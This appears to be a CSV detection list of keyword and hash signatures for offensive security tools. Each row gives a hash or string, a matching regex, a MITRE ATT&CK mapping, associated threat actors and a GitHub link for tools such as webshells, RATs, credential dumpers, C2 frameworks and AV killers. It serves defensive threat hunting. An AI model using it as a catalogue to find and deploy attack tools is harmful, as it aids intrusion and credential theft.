"*b9760df5de508a4b3b655a3de28ae5ab271d4189299513c848a033f9480d5766*",".{0,1000}b9760df5de508a4b3b655a3de28ae5ab271d4189299513c848a033f9480d5766.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","35077"
"*b97733c8926c8186363f74a875b92d7749bb06f2edc94280322d6f5b9af22798*",".{0,1000}b97733c8926c8186363f74a875b92d7749bb06f2edc94280322d6f5b9af22798.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","35078"
"*b979225195d70240e32deae75233b82e05ceb32bab4d08d970399065fba8ea88*",".{0,1000}b979225195d70240e32deae75233b82e05ceb32bab4d08d970399065fba8ea88.{0,1000}","offensive_tool_keyword","SpoolFool","Exploit for CVE-2022-21999 - Windows Print Spooler Elevation of Privilege Vulnerability (LPE)","T1068 - T1055 - T1059.003","TA0004 - TA0005 - TA0003","","Dispossessor","Privilege Escalation","https://github.com/ly4k/SpoolFool","1","0","#filehash","N/A","9","8","788","160","2022-02-09T16:54:09Z","2022-02-08T17:25:44Z","35079"
"*b97aed185c60d0b6764cdcd4c6133d09c0f028ed4a53e766d75b42418765e0c4*",".{0,1000}b97aed185c60d0b6764cdcd4c6133d09c0f028ed4a53e766d75b42418765e0c4.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","35080"
"*b988905cfe09a6fb9a8f034a2efb0403731b2eeb29e19403d3eaade2b02fdfbd*",".{0,1000}b988905cfe09a6fb9a8f034a2efb0403731b2eeb29e19403d3eaade2b02fdfbd.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","35081"
"*b99078f0abc00a579cf218f3ed1d1ca89fffd5c328239303bf98432732df00f0*",".{0,1000}b99078f0abc00a579cf218f3ed1d1ca89fffd5c328239303bf98432732df00f0.{0,1000}","offensive_tool_keyword","ThievingFox","collection of post-exploitation tools to gather credentials from various password managers","T1555 - T1003 - T1056 - T1070","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Slowerzs/ThievingFox","1","0","#filehash","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","35083"
"*b990e7cba87af7e6a61a0c326047e99c0750313e6c9bec82ab4b6e2ff757d8e3*",".{0,1000}b990e7cba87af7e6a61a0c326047e99c0750313e6c9bec82ab4b6e2ff757d8e3.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","35084"
"*b9919cdb3ebf7abed7458e357a71924bb0dd43332e90c30a6f146caefcf56baa*",".{0,1000}b9919cdb3ebf7abed7458e357a71924bb0dd43332e90c30a6f146caefcf56baa.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","35085"
"*b9946bcbb56b9088f6d5ab8660665ea8f80c5f3d08df6e4531362653d07de2c9*",".{0,1000}b9946bcbb56b9088f6d5ab8660665ea8f80c5f3d08df6e4531362653d07de2c9.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","35087"
"*b9af7e45ec82950abedd3e86d466d275f0e19856c0a0fe52fc9c2349d77aa7c2*",".{0,1000}b9af7e45ec82950abedd3e86d466d275f0e19856c0a0fe52fc9c2349d77aa7c2.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","35093"
"*b9d5e62f9504669d9f3f68ff4b0e0fbce20d9b48c5a2560cb0d71b37666bb013*",".{0,1000}b9d5e62f9504669d9f3f68ff4b0e0fbce20d9b48c5a2560cb0d71b37666bb013.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","35097"
"*b9d705378ce1af446cc51bbbeccdda2d05bbc6b3c9249f3b69661d5f763dafaa*",".{0,1000}b9d705378ce1af446cc51bbbeccdda2d05bbc6b3c9249f3b69661d5f763dafaa.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","35098"
"*b9de1ac4e68a0c4be90109880892b3b34a296d02102d94f1f79913fcd4806922*",".{0,1000}b9de1ac4e68a0c4be90109880892b3b34a296d02102d94f1f79913fcd4806922.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","35099"
"*b9e0d24db9c2db196bf5290e2ea67913ba908e69e951c62a89a6e80e90c40a0e*",".{0,1000}b9e0d24db9c2db196bf5290e2ea67913ba908e69e951c62a89a6e80e90c40a0e.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","35100"
"*b9f0a5f6d8d717f469a530d9796bece42e455e201da01012c717098f0cac53d5*",".{0,1000}b9f0a5f6d8d717f469a530d9796bece42e455e201da01012c717098f0cac53d5.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","35103"
"*b9fb14ee0bd4d442599f5178c6acc88c382d35c67c9d9ce4293505b47c529fd7*",".{0,1000}b9fb14ee0bd4d442599f5178c6acc88c382d35c67c9d9ce4293505b47c529fd7.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","35104"
"*b9fcab4af77e110405b886ebf88159fc07f5da5f69d5d872867db2ee0809acb9*",".{0,1000}b9fcab4af77e110405b886ebf88159fc07f5da5f69d5d872867db2ee0809acb9.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","35105"
"*ba052c32cb079708df013cb6801329b186f0fe1a4c6e1c134e839a795ac6bcf9*",".{0,1000}ba052c32cb079708df013cb6801329b186f0fe1a4c6e1c134e839a795ac6bcf9.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","35106"
"*ba0ec36076382b07332c8d5329ccec4c577ec5d6527c1a6dc56694744763024c*",".{0,1000}ba0ec36076382b07332c8d5329ccec4c577ec5d6527c1a6dc56694744763024c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","35107"
"*ba18587fbe9f6bdf1f7cfe3c3e9c102775fc4aada581dfc058dc9e781e75de01*",".{0,1000}ba18587fbe9f6bdf1f7cfe3c3e9c102775fc4aada581dfc058dc9e781e75de01.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","35109"
"*BA1F3992-9654-4424-A0CC-26158FDFBF74*",".{0,1000}BA1F3992\-9654\-4424\-A0CC\-26158FDFBF74.{0,1000}","offensive_tool_keyword","DumpNParse","A Combination LSASS Dumper and LSASS Parser","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/icyguider/DumpNParse","1","0","#GUIDProject","N/A","10","2","150","24","2021-11-21T14:25:24Z","2021-11-21T14:18:42Z","35110"
"*BA1F3992-9654-4424-A0CC-26158FDFBF74*",".{0,1000}BA1F3992\-9654\-4424\-A0CC\-26158FDFBF74.{0,1000}","offensive_tool_keyword","MiniDump","C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/cube0x0/MiniDump","1","0","#GUIDProject","N/A","10","3","291","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z","35111"
"*ba20280d3b1e1ba3539232ee1b32c6071958811da1cb6716aeb33480977da408*",".{0,1000}ba20280d3b1e1ba3539232ee1b32c6071958811da1cb6716aeb33480977da408.{0,1000}","offensive_tool_keyword","Psnmap","Powershell scanner (nmap like)","T1086 - T1046 - T1059","TA0007","N/A","Black Basta","Discovery","https://github.com/KurtDeGreeff/PlayPowershell/blob/master/PSnmap.ps1","1","0","#filehash","N/A","7","2","178","64","2024-08-23T18:24:20Z","2015-01-24T10:46:41Z","35112"
"*ba41cc2f4c5dfb7df874b0e92f99f33b37b11574aab288d229749eba00e98813*",".{0,1000}ba41cc2f4c5dfb7df874b0e92f99f33b37b11574aab288d229749eba00e98813.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","#filehash","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","35114"
"*ba5925e3a8778e1bf0a38085336d8cff3bfe162fe425bc5a93fcb8ae5bb7ebfd*",".{0,1000}ba5925e3a8778e1bf0a38085336d8cff3bfe162fe425bc5a93fcb8ae5bb7ebfd.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","35117"
"*ba635e7771b43f21a15114a4f209241d85142f937fd9e2d65a39015a2822b9fc*",".{0,1000}ba635e7771b43f21a15114a4f209241d85142f937fd9e2d65a39015a2822b9fc.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","35119"
"*ba64c77b96c7de18007ca116ca8c8f93c3bba3cdc631e1a041e9d0afb46ae989*",".{0,1000}ba64c77b96c7de18007ca116ca8c8f93c3bba3cdc631e1a041e9d0afb46ae989.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","35120"
"*ba69953f7e76cb9a1d4992fbb7db913284d265e7d32f6659dd3527874a473404*",".{0,1000}ba69953f7e76cb9a1d4992fbb7db913284d265e7d32f6659dd3527874a473404.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","35123"
"*ba79187d6d0fbec4e1b989565e8ec192547c400826d9d3fcd7fd4b4c506bbe27*",".{0,1000}ba79187d6d0fbec4e1b989565e8ec192547c400826d9d3fcd7fd4b4c506bbe27.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","35124"
"*ba7aa4e5aba5fa90f17a2aca9cee62a2b01bb1fc91f6433643e48cdfa4b1c03d*",".{0,1000}ba7aa4e5aba5fa90f17a2aca9cee62a2b01bb1fc91f6433643e48cdfa4b1c03d.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","35125"
"*ba7e216ca801f1b05c2cc100226b5d8f90263ee92f910a6febf637bb7ae3bec7*",".{0,1000}ba7e216ca801f1b05c2cc100226b5d8f90263ee92f910a6febf637bb7ae3bec7.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","35127"
"*ba81b4c4203d94358c4b0b725b4f905ddfb9b4edea7ad6e097d770485e5a8679*",".{0,1000}ba81b4c4203d94358c4b0b725b4f905ddfb9b4edea7ad6e097d770485e5a8679.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","35128"
"*ba84810ab6a2d27ffa9303915bbd18e1703d032dd133cf93ceeecf89e2f59fe6*",".{0,1000}ba84810ab6a2d27ffa9303915bbd18e1703d032dd133cf93ceeecf89e2f59fe6.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","35130"
"*ba873651f323f87c83b99bccdbb136706dd1bcdc5fb29164be0bd8ebff2770ae*",".{0,1000}ba873651f323f87c83b99bccdbb136706dd1bcdc5fb29164be0bd8ebff2770ae.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","35131"
"*ba912bf7875b66acdc47babd2884d56d240eb07eda2a9384ab0dd79f2e29f252*",".{0,1000}ba912bf7875b66acdc47babd2884d56d240eb07eda2a9384ab0dd79f2e29f252.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","35134"
"*ba933871cda9e4c84297af7c34424c01d565e7f3968f14e8bae4ec26e7f7b389*",".{0,1000}ba933871cda9e4c84297af7c34424c01d565e7f3968f14e8bae4ec26e7f7b389.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","35135"
"*ba9340aea52ef7176b56c69287e191d7919e73fb5e59bc6b059136740f375dc6*",".{0,1000}ba9340aea52ef7176b56c69287e191d7919e73fb5e59bc6b059136740f375dc6.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","35136"
"*ba9660f0473b88e967d6eaeff0671afb20617fe49fe028a4d543e42edd0a8476*",".{0,1000}ba9660f0473b88e967d6eaeff0671afb20617fe49fe028a4d543e42edd0a8476.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","35137"
"*ba97f0a315cf16438bb5318e47ddad24ec2bc6c851881b8ac5e3c27258d4b484*",".{0,1000}ba97f0a315cf16438bb5318e47ddad24ec2bc6c851881b8ac5e3c27258d4b484.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","35138"
"*ba99e7ff67fb59ab551943030c912a2dfa0c9f1e1bba2c3e53a71aa5348386ec*",".{0,1000}ba99e7ff67fb59ab551943030c912a2dfa0c9f1e1bba2c3e53a71aa5348386ec.{0,1000}","offensive_tool_keyword","AVKiller","forcibly close some anti-virus processes through process injection (taking 360 Security Guard and 360 Anti-Virus as examples)","T1055.011 - T1089","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/1y0n/AVKiller","1","0","#filehash","N/A","10","2","127","18","2023-12-26T05:47:55Z","2023-12-19T00:55:23Z","35139"
"*BA9D2748-1342-41A3-87F2-343E82D99813*",".{0,1000}BA9D2748\-1342\-41A3\-87F2\-343E82D99813.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","35142"
"*baa3a3f7c6a17963ab80baff6de74aca91e4e75fa0a4f80bf18af9a5622edec3*",".{0,1000}baa3a3f7c6a17963ab80baff6de74aca91e4e75fa0a4f80bf18af9a5622edec3.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","35143"
"*baa689ba1163c0c06f50a93ffac5ed0e4494fef7f0091edb95fa1a76b1551a40*",".{0,1000}baa689ba1163c0c06f50a93ffac5ed0e4494fef7f0091edb95fa1a76b1551a40.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","#filehash","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","35144"
"*babelstrike.py -*",".{0,1000}babelstrike\.py\s\-.{0,1000}","offensive_tool_keyword","BabelStrike","The purpose of this tool is to normalize and generate possible usernames out of a full names list that may include names written in multiple (non-English) languages. common problem occurring from scraped employee names lists (e.g. from Linkedin)","T1078 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/t3l3machus/BabelStrike","1","0","N/A","N/A","1","2","132","23","2024-07-19T07:02:42Z","2023-01-10T07:59:00Z","35146"
"*BabelStrike-main*",".{0,1000}BabelStrike\-main.{0,1000}","offensive_tool_keyword","BabelStrike","The purpose of this tool is to normalize and generate possible usernames out of a full names list that may include names written in multiple (non-English) languages. common problem occurring from scraped employee names lists (e.g. from Linkedin)","T1078 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/t3l3machus/BabelStrike","1","1","N/A","N/A","1","2","132","23","2024-07-19T07:02:42Z","2023-01-10T07:59:00Z","35147"
"*BabySh4rk - MomySh4rk*",".{0,1000}BabySh4rk\s\-\sMomySh4rk.{0,1000}","offensive_tool_keyword","BabyShark","This is a basic C2 generic server written in Python and Flask.","T1547.001 - T1059.003 - T1132.001 - T1140 - T1083 - T1070.004 - T1105 - T1056.001 - T1057 - T1012 - T1053.005 - T1218.005 - T1082 - T1016 - T1033","TA0006 - TA0011 - TA0040","N/A","Kimsuky","C2","https://github.com/UnkL4b/BabyShark","1","0","#content","N/A","10","10","189","30","2021-07-03T00:18:18Z","2020-06-02T12:27:20Z","35149"
"*bac0dc3ff787d4aa2989b0d899510c98a0a7ef5923c55860c70b27c96a1a3d19*",".{0,1000}bac0dc3ff787d4aa2989b0d899510c98a0a7ef5923c55860c70b27c96a1a3d19.{0,1000}","offensive_tool_keyword","Dispossessor","hashes of AV removing scripts tools and notes from the Dispossessor ransomware group","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","4","8","N/A","N/A","N/A","N/A","35150"
"*bac188a072ffe2acbdd2d33035c3747b3febad807f5db13caa7b15bcb5bff415*",".{0,1000}bac188a072ffe2acbdd2d33035c3747b3febad807f5db13caa7b15bcb5bff415.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","#filehash","N/A","N/A","10","3212","499","2025-01-19T12:29:35Z","2022-07-10T15:36:24Z","35151"
